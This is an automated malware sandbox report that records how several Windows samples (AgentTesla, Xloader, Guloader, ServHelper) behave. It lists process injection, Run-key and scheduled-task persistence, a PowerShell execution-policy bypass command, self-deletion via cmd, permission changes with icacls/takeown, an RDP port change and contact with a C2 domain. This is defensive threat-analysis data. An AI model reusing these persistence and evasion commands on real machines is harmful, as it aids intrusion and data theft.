2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
74s
Max time network
70s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 340 set thread context of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe
"C:\Users\Admin\AppData\Local\Temp\3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe"
Network
Files
memory/340-60-0x0000000000C20000-0x0000000000C21000-memory.dmp
memory/340-62-0x0000000004550000-0x0000000004551000-memory.dmp
memory/340-63-0x00000000004F0000-0x000000000050B000-memory.dmp
memory/340-64-0x0000000008040000-0x00000000080D0000-memory.dmp
memory/340-65-0x00000000053E0000-0x000000000542B000-memory.dmp
memory/568-66-0x0000000000400000-0x0000000000448000-memory.dmp
memory/568-67-0x00000000004025AC-mapping.dmp
memory/568-70-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
win7v20210410
Max time kernel
1s
Max time network
6s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210408
Max time kernel
109s
Max time network
113s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4016 set thread context of 3892 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp351A.tmp"
C:\Users\Admin\AppData\Local\Temp\87597.exe
"C:\Users\Admin\AppData\Local\Temp\87597.exe"
Network
Files
memory/4016-114-0x00000000005E0000-0x00000000005E1000-memory.dmp
memory/4016-116-0x0000000005000000-0x0000000005001000-memory.dmp
memory/4016-117-0x00000000055A0000-0x00000000055A1000-memory.dmp
memory/4016-118-0x0000000005140000-0x0000000005141000-memory.dmp
memory/4016-119-0x00000000050A0000-0x000000000559E000-memory.dmp
memory/4016-120-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
memory/4016-121-0x00000000052E0000-0x00000000052E1000-memory.dmp
memory/4016-122-0x00000000054A0000-0x00000000054BB000-memory.dmp
memory/4016-123-0x0000000000F80000-0x0000000001000000-memory.dmp
memory/4016-124-0x0000000001000000-0x000000000103C000-memory.dmp
memory/3364-125-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp351A.tmp
| MD5 | c81583db743272eeb3b83a7389b4236f |
| SHA1 | 9f49a359817ce77d9003672bfeefaeb74615da68 |
| SHA256 | 3e5d78fddbd13f76566ef8831e6735a7bb556738ee31c643147051c20e3ba74b |
| SHA512 | 45ecd06010796155cbb9d1855b8ed910afab57194f8dcebbe1a1e6e754f7c6daa19d52827487627cd12e360274b7a4cd4f4576925d545798b7558e71b5c462a3 |
memory/3892-127-0x0000000000400000-0x000000000043C000-memory.dmp
memory/3892-128-0x00000000004374AE-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\87597.exe.log
| MD5 | 90acfd72f14a512712b1a7380c0faf60 |
| SHA1 | 40ba4accb8faa75887e84fb8e38d598dc8cf0f12 |
| SHA256 | 20806822f0c130b340504132c1461b589261fbbc518e468f4f90733ab514cb86 |
| SHA512 | 29dbf85e14e60868574cb4dc9bda83d3c229fb956733d8d2557f2475ee0e690ac9c2e72f31e02284996da6906ba2dbfa382a29b04c15a2406571d8ee19ad16b9 |
memory/3892-134-0x0000000005190000-0x0000000005191000-memory.dmp
memory/3892-135-0x0000000005130000-0x0000000005131000-memory.dmp
memory/3892-136-0x0000000005D30000-0x0000000005D31000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
37s
Max time network
91s
Command Line
Signatures
Reads user/profile data of web browsers
Processes
C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe
"C:\Users\Admin\AppData\Local\Temp\29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe
"C:\Users\Admin\AppData\Local\Temp\73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe"
Network
Files
memory/1652-60-0x0000000076641000-0x0000000076643000-memory.dmp
memory/1652-61-0x0000000074BA1000-0x0000000074BA3000-memory.dmp
memory/1652-62-0x0000000004750000-0x000000000481C000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win7v20210410
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2020 set thread context of 1912 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 1912 set thread context of 1272 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 268 set thread context of 1272 | N/A | C:\Windows\SysWOW64\chkdsk.exe | C:\Windows\Explorer.EXE |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\chkdsk.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win10v20210408
Max time kernel
153s
Max time network
162s
Command Line
Signatures
Xloader
suricata: ET MALWARE FormBook CnC Checkin (GET)
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 800 set thread context of 2308 | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 2308 set thread context of 3044 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 3572 set thread context of 3044 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe
"C:\Users\Admin\AppData\Local\Temp\Inv_7623980.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210408
Max time kernel
145s
Max time network
148s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.xivstatus.com | udp |
| N/A | 104.248.109.110:443 | api.xivstatus.com | tcp |
| N/A | 8.8.8.8:53 | mail.server.com | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
14s
Max time network
114s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe
"C:\Users\Admin\AppData\Local\Temp\RICHIESTA DI OFFERTA.exe"
Network
Files
memory/3156-116-0x00000000021C0000-0x00000000021D3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
137s
Max time network
163s
Command Line
Signatures
ServHelper
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3580db26-b82b-47d9-8e5f-e24f5b14eb4e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1cf4031a-ca01-41ea-8046-44708c88615d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50bc70bd-f0fa-4b04-aebd-701ed7e4a96c | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ed7b35f6-9634-40a8-ac32-afa719ee2e50 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7cd598a8-2bd4-4e30-a321-a292ad4582c4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ASY756RMWBBEDR3ACTXH.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5873f907-384f-419e-a7f2-77e336422f09 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_09b3c272-c5d6-4407-a44c-bd7b90aec184 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8db55974-e7ca-45a0-8d5a-6a13f50f228d | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd092868-a398-4a63-9e80-98d8bf5f0f99 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ffa327ee-faa2-4c99-abc7-a016aa600630 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_14a1c626-a976-4aa5-96b6-5b17ce6ba831 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a02933426885d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
